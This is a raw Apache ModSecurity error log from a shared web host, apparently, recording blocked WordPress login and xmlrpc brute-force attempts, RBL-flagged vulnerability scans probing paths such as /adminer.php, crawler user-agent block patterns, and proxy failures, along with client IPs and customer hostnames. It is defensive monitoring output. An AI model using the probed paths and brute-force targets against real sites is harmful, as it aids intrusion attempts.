[Tue May 26 15:56:07.374145 2026] [security2:error] [pid 745492:tid 745715] [client 106.219.85.83:6192] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1P4mEQglTmoWcfxKPMgAAAN8"]
[Tue May 26 15:56:08.527355 2026] [security2:error] [pid 747840:tid 747970] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1QIm6MwAuYuZKxvkJZwAAAQo"]
[Tue May 26 15:56:08.557072 2026] [security2:error] [pid 747840:tid 748025] [client 62.60.130.233:52858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-login.php"] [unique_id "ahV1QIm6MwAuYuZKxvkJawAAAUE"], referer: https://www.bing.com/
[Tue May 26 15:56:08.892597 2026] [security2:error] [pid 747840:tid 747982] [client 62.60.130.233:50980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-login.php"] [unique_id "ahV1QIm6MwAuYuZKxvkJdAAAARY"], referer: https://www.bing.com/
[Tue May 26 15:56:09.224684 2026] [security2:error] [pid 745492:tid 745641] [client 77.68.83.86:52687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/images/images/cache.php"] [unique_id "ahV1QYmEQglTmoWcfxKPRAAAAJU"], referer: www.google.com
[Tue May 26 15:56:09.227682 2026] [security2:error] [pid 747840:tid 748071] [client 103.153.130.62:61810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1QYm6MwAuYuZKxvkJeQAAAW8"]
[Tue May 26 15:56:09.227812 2026] [security2:error] [pid 747840:tid 748071] [client 103.153.130.62:61810] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1QYm6MwAuYuZKxvkJeQAAAW8"]
[Tue May 26 15:56:10.174168 2026] [security2:error] [pid 745492:tid 745633] [client 198.23.250.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1QomEQglTmoWcfxKPTAAAAI0"]
[Tue May 26 15:56:10.562689 2026] [security2:error] [pid 745492:tid 745643] [client 146.174.165.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1QomEQglTmoWcfxKPTQAAAJc"]
[Tue May 26 15:56:11.268279 2026] [security2:error] [pid 747840:tid 748028] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Qom6MwAuYuZKxvkJrwAAAUQ"]
[Tue May 26 15:56:11.295098 2026] [security2:error] [pid 745492:tid 745707] [client 85.208.96.207:33580] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/list/"] [unique_id "ahV1Q4mEQglTmoWcfxKPZAAAANc"]
[Tue May 26 15:56:11.295189 2026] [security2:error] [pid 745492:tid 745707] [client 85.208.96.207:33580] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/list/"] [unique_id "ahV1Q4mEQglTmoWcfxKPZAAAANc"]
[Tue May 26 15:56:11.483702 2026] [security2:error] [pid 745492:tid 745631] [client 103.44.52.196:46764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Q4mEQglTmoWcfxKPaAAAAIs"]
[Tue May 26 15:56:11.483853 2026] [security2:error] [pid 745492:tid 745631] [client 103.44.52.196:46764] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Q4mEQglTmoWcfxKPaAAAAIs"]
[Tue May 26 15:56:11.592255 2026] [security2:error] [pid 745492:tid 745683] [client 198.23.250.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1Q4mEQglTmoWcfxKPaQAAAL8"], referer: https://www.anujtradingco.com/marketing-website.com=c16575e05a0e2a14fb4810f0564c991e
[Tue May 26 15:56:12.846032 2026] [security2:error] [pid 747840:tid 748082] [client 198.23.250.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1RIm6MwAuYuZKxvkJ1QAAAXo"], referer: https://anujtradingco.com/marketing-website.com=c16575e05a0e2a14fb4810f0564c991e
[Tue May 26 15:56:13.605830 2026] [security2:error] [pid 747840:tid 748036] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1RYm6MwAuYuZKxvkJ3AAAAUw"]
[Tue May 26 15:56:14.020569 2026] [security2:error] [pid 747840:tid 748045] [client 198.23.250.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1RYm6MwAuYuZKxvkJ7gAAAVU"], referer: https://www.anujtradingco.com/marketing-website.com=c16575e05a0e2a14fb4810f0564c991e
[Tue May 26 15:56:15.159301 2026] [security2:error] [pid 747840:tid 748055] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Rom6MwAuYuZKxvkKBAAAAV8"]
[Tue May 26 15:56:16.940474 2026] [proxy:error] [pid 745492:tid 745697] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:56:16.940552 2026] [proxy_http:error] [pid 745492:tid 745697] [client 195.178.110.48:41080] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:56:16.941128 2026] [proxy:error] [pid 745492:tid 745697] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:56:16.941157 2026] [proxy_http:error] [pid 745492:tid 745697] [client 195.178.110.48:41080] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:56:16.964203 2026] [security2:error] [pid 745492:tid 745698] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1SImEQglTmoWcfxKPqwAAAM4"]
[Tue May 26 15:56:17.136191 2026] [security2:error] [pid 745492:tid 745675] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV1SYmEQglTmoWcfxKPtgAAALc"]
[Tue May 26 15:56:17.136593 2026] [security2:error] [pid 747840:tid 747991] [client 66.249.64.96:39325] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV1SYm6MwAuYuZKxvkKMAAAAR8"]
[Tue May 26 15:56:17.855686 2026] [proxy:error] [pid 747840:tid 747971] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:56:17.855755 2026] [proxy_http:error] [pid 747840:tid 747971] [client 195.178.110.48:41082] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:56:17.856801 2026] [proxy:error] [pid 747840:tid 747971] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:56:17.856833 2026] [proxy_http:error] [pid 747840:tid 747971] [client 195.178.110.48:41082] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:56:18.018041 2026] [security2:error] [pid 747840:tid 748084] [client 106.219.85.83:1931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Som6MwAuYuZKxvkKRgAAAXw"]
[Tue May 26 15:56:18.018137 2026] [security2:error] [pid 747840:tid 748084] [client 106.219.85.83:1931] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Som6MwAuYuZKxvkKRgAAAXw"]
[Tue May 26 15:56:18.371239 2026] [security2:error] [pid 745492:tid 745646] [client 195.178.110.48:41086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/en"] [unique_id "ahV1SomEQglTmoWcfxKPxQAAAJo"]
[Tue May 26 15:56:18.684590 2026] [security2:error] [pid 747840:tid 748092] [client 223.123.35.44:36269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Som6MwAuYuZKxvkKUwAAAYQ"]
[Tue May 26 15:56:18.684724 2026] [security2:error] [pid 747840:tid 748092] [client 223.123.35.44:36269] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1Som6MwAuYuZKxvkKUwAAAYQ"]
[Tue May 26 15:56:18.779192 2026] [security2:error] [pid 747840:tid 748066] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Som6MwAuYuZKxvkKUgAAAWo"]
[Tue May 26 15:56:19.421041 2026] [security2:error] [pid 745492:tid 745735] [client 103.153.130.62:62093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1S4mEQglTmoWcfxKPygAAAPM"]
[Tue May 26 15:56:19.421497 2026] [security2:error] [pid 745492:tid 745735] [client 103.153.130.62:62093] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1S4mEQglTmoWcfxKPygAAAPM"]
[Tue May 26 15:56:21.061363 2026] [security2:error] [pid 745492:tid 745692] [client 143.110.243.118:40060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/css.php"] [unique_id "ahV1TYmEQglTmoWcfxKP2QAAAMg"]
[Tue May 26 15:56:21.727554 2026] [security2:error] [pid 747840:tid 748066] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1TYm6MwAuYuZKxvkKkgAAAWo"]
[Tue May 26 15:56:21.818905 2026] [security2:error] [pid 747840:tid 748038] [client 103.44.52.196:57146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1TYm6MwAuYuZKxvkKnwAAAU4"]
[Tue May 26 15:56:21.819051 2026] [security2:error] [pid 747840:tid 748038] [client 103.44.52.196:57146] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1TYm6MwAuYuZKxvkKnwAAAU4"]
[Tue May 26 15:56:23.357671 2026] [security2:error] [pid 747840:tid 748023] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1Tom6MwAuYuZKxvkKswAAAT8"]
[Tue May 26 15:56:25.581064 2026] [security2:error] [pid 745492:tid 745724] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1UYmEQglTmoWcfxKP7wAAAOg"]
[Tue May 26 15:56:25.699246 2026] [security2:error] [pid 747840:tid 748049] [client 141.164.86.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1UYm6MwAuYuZKxvkK2gAAAVk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:56:27.404512 2026] [security2:error] [pid 747840:tid 748028] [client 141.164.86.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1U4m6MwAuYuZKxvkK6wAAAUQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230906&moderation-hash=ba033614e47bbe413fcd130609457956
[Tue May 26 15:56:27.627208 2026] [security2:error] [pid 745492:tid 745718] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1U4mEQglTmoWcfxKQEQAAAOI"]
[Tue May 26 15:56:28.819639 2026] [security2:error] [pid 745492:tid 745670] [client 106.219.85.83:12893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1VImEQglTmoWcfxKQLAAAALI"]
[Tue May 26 15:56:28.819750 2026] [security2:error] [pid 745492:tid 745670] [client 106.219.85.83:12893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1VImEQglTmoWcfxKQLAAAALI"]
[Tue May 26 15:56:29.607999 2026] [security2:error] [pid 747840:tid 748086] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1VYm6MwAuYuZKxvkK-gAAAX4"]
[Tue May 26 15:56:29.763317 2026] [security2:error] [pid 745492:tid 745663] [client 103.153.130.62:62371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1VYmEQglTmoWcfxKQRQAAAKs"]
[Tue May 26 15:56:29.763450 2026] [security2:error] [pid 745492:tid 745663] [client 103.153.130.62:62371] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1VYmEQglTmoWcfxKQRQAAAKs"]
[Tue May 26 15:56:30.421086 2026] [security2:error] [pid 745492:tid 745571] [remote 54.38.29.86:36264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahV1VomEQglTmoWcfxKQSwAAr0s"]
[Tue May 26 15:56:31.662604 2026] [security2:error] [pid 747840:tid 748070] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1V4m6MwAuYuZKxvkLDwAAAW4"]
[Tue May 26 15:56:32.360924 2026] [security2:error] [pid 747840:tid 748088] [client 103.44.52.196:42742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1WIm6MwAuYuZKxvkLHQAAAYA"]
[Tue May 26 15:56:32.361049 2026] [security2:error] [pid 747840:tid 748088] [client 103.44.52.196:42742] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1WIm6MwAuYuZKxvkLHQAAAYA"]
[Tue May 26 15:56:33.192677 2026] [security2:error] [pid 747840:tid 748075] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1WIm6MwAuYuZKxvkLKQAAAXM"]
[Tue May 26 15:56:33.502420 2026] [security2:error] [pid 745492:tid 745658] [client 143.110.243.118:37258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/adminer.php"] [unique_id "ahV1WYmEQglTmoWcfxKQdAAAAKY"]
[Tue May 26 15:56:35.686342 2026] [security2:error] [pid 747840:tid 748045] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1W4m6MwAuYuZKxvkLVwAAAVU"]
[Tue May 26 15:56:36.089883 2026] [security2:error] [pid 747840:tid 748094] [client 114.119.137.70:55095] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.yourstorybag.com"] [uri "/the-storied-way/"] [unique_id "ahV1XIm6MwAuYuZKxvkLbAAAAYY"], referer: https://redcircle.com/shows/golpo-stories-from-around-the-world/ep/cf1379a8-8206-4874-a3e2-8b1ef2b8e267
[Tue May 26 15:56:37.034334 2026] [security2:error] [pid 745492:tid 745653] [client 69.124.119.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1XImEQglTmoWcfxKQkAAAAKE"]
[Tue May 26 15:56:38.019586 2026] [security2:error] [pid 747840:tid 748023] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1XYm6MwAuYuZKxvkLlAAAAT8"]
[Tue May 26 15:56:38.468725 2026] [security2:error] [pid 745492:tid 745732] [client 127.0.0.1:18722] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "127.0.0.1"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahV1XomEQglTmoWcfxKQmwAAAPA"]
[Tue May 26 15:56:38.468812 2026] [security2:error] [pid 745492:tid 745625] [client 127.0.0.1:18708] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.taotechservices.com"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahV1XomEQglTmoWcfxKQmgAAAIU"]
[Tue May 26 15:56:38.469164 2026] [security2:error] [pid 745492:tid 745714] [client 74.7.230.53:34746] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahV1XomEQglTmoWcfxKQmQAA3mI"]
[Tue May 26 15:56:39.241219 2026] [security2:error] [pid 745492:tid 745744] [client 106.219.85.83:26141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1X4mEQglTmoWcfxKQpQAAAPw"]
[Tue May 26 15:56:39.241317 2026] [security2:error] [pid 745492:tid 745744] [client 106.219.85.83:26141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1X4mEQglTmoWcfxKQpQAAAPw"]
[Tue May 26 15:56:40.008093 2026] [security2:error] [pid 745492:tid 745644] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1X4mEQglTmoWcfxKQrAAAAJg"]
[Tue May 26 15:56:40.293741 2026] [security2:error] [pid 745492:tid 745698] [client 103.153.130.62:62649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1YImEQglTmoWcfxKQtwAAAM4"]
